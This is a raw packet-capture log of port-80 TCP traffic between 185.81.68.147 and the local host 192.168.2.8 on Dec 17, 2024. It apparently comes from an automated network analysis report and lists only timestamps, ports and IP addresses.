                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569447041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569499016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.569685936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570346117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570496082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.570544004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.571325064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.613622904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713833094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713855982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713870049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.713907003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714009047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714039087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714651108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714665890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.714976072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715540886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715584040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.715640068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716523886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716537952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.716571093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717417002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717570066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.717660904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.718431950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.718445063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719082117 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719362020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719429016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.719482899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720276117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720304966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.720432997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721205950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721296072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.721340895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722183943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722335100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.722479105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723304987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723352909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.723445892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724060059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724190950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.724304914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725136042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725181103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725342989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.725985050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.726070881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.726203918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727054119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727070093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727206945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.727894068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728065014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728106022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728885889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.728949070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.729053020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730000973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730015039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.730179071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731329918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731343985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731533051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731671095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731801033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.731898069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732604980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732822895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.732938051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733613968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733665943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.733784914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734550953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734719992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.734813929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735526085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735632896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.735757113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736474037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736485958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.736717939 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737462044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737536907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.737606049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.738406897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.738981962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739075899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739272118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739644051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.739830017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.922704935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923542023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923624039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.923722982 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924359083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924459934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.924664974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925424099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925659895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.925756931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926394939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926405907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.926493883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927212000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927366972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.927459002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928397894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928564072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.928704977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929128885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929179907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.929250002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930135965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930244923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.930341959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931037903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931215048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.931332111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932076931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932089090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.932332039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933015108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933341026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.933430910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934283972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934298038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934429884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934921026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.934932947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.935014963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.935905933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936000109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936083078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.936813116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937382936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937464952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937764883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.937902927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938170910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938709974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938858032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.938949108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939672947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939717054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.939802885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940545082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940697908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.940788031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941575050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941730976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.941819906 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942467928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942576885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.942691088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943485022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943568945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.943651915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944420099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944571972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.944672108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945310116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945446014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.945570946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946281910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946449995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.946554899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947204113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947319984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.947398901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948285103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948434114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.948518991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949132919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949281931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.949366093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950177908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950200081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.950325966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951011896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951076031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.951211929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952096939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952299118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.952439070 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953634024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953648090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953752041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:08.953984976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.135864973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.136797905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.136852980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137012959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137705088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137800932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.137835026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138652086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138850927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.138890982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139585972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139664888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.139710903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140678883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140692949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.140810966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141733885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141746044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.141880989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142637968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142649889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.142733097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143564939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143672943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.143799067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144383907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144598961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.144620895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145442009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145453930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.145653009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146308899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146393061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.146421909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147214890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147258043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.147284031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.191618919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290735960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290826082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.290958881 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291357994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291501045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291594028 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.291883945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292042017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292290926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.292962074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.293070078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.293220043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294166088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294246912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.294349909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295202971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295305014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295404911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295733929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295804024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.295943022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296526909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296760082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.296916962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297328949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297429085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.297653913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298094988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298144102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298228979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298892021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.298909903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299027920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299875021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.299953938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300024986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300776005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.300940990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301064014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301791906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301830053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.301949024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302663088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302726984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.302896976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:09.303637028 CET8049709185.81.68.147192.168.2.8
